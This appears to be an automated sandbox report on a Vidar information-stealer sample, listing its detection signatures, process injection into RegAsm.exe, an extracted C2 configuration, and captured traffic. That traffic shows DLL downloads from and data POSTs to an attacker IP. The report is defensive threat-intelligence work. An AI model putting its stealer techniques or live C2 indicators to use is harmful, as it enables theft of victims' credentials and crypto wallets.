Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1417273
MD5:	78f23006210bda6b5e26b8cbefa9758a
SHA1:	b1a191597f5a2ecdd3b9185b89072cfae06ae5cd
SHA256:	631acc4c860b0628e08895af0c2c9dd0c7af17f32da4cd1e2e22e85a1f534907
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected AntiVM3

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Country aware sample found (crashes after keyboard check)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 2016 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 78F23006210BDA6B5E26B8CBEFA9758A)

conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 6212 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 5832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 848 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "debff3f4f38e9beeaf8e215a762c8549", "Version": "8.6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.2121549788.0000000004315000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000004.00000002.2403578458.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2016	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5832	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5832	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5832	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.file.exe.4315570.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.file.exe.4315570.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
4.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000001.00000002.2121549788.0000000004315000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "debff3f4f38e9beeaf8e215a762c8549", "Version": "8.6"}

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040668C CryptUnprotectData,LocalAlloc,LocalFree,	4_2_0040668C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004085C0 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,	4_2_004085C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00406629 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	4_2_00406629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040FAC0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	4_2_0040FAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBD6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	4_2_6CBD6C80

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.105.90.131:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.6:49701 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
Source:	Binary string: System.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: Friendly.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: c:\lb9ddh54ecqka\obj\Release\Friendly.pdb source: file.exe
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.4.dr, vcruntime140[1].dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.4.dr, msvcp140.dll.4.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: System.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: System.Core.ni.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: Friendly.pdb4 source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
Source:	Binary string: mscorlib.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: System.Core.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000004.00000002.2409243083.0000000019D28000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
Source:	Binary string: System.ni.pdb source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: mscorlib.pdbH source: WER3DCE.tmp.dmp.8.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3DCE.tmp.dmp.8.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040C094 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040C094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00401140 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	4_2_00401140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040A132 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040A132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004143FD _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	4_2_004143FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040970D _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040970D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00414B02 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	4_2_00414B02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00413DF6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	4_2_00413DF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041479E _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	4_2_0041479E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00409B10 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_00409B10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0041418A _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

4_2_0041418A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199658817715

Source: global traffic

HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 78.46.229.36 78.46.229.36
Source: Joe Sandbox View	IP Address: 104.105.90.131 104.105.90.131

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEGDBAEBFIIDHJJJEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKECFCFBGCAAKEGIJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 6717Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 114545Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_004051CC _EH_prolog,InternetOpenA,StrCmpCA,InternetOpenUrlA,CreateFileA,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

4_2_004051CC

Source: global traffic	HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
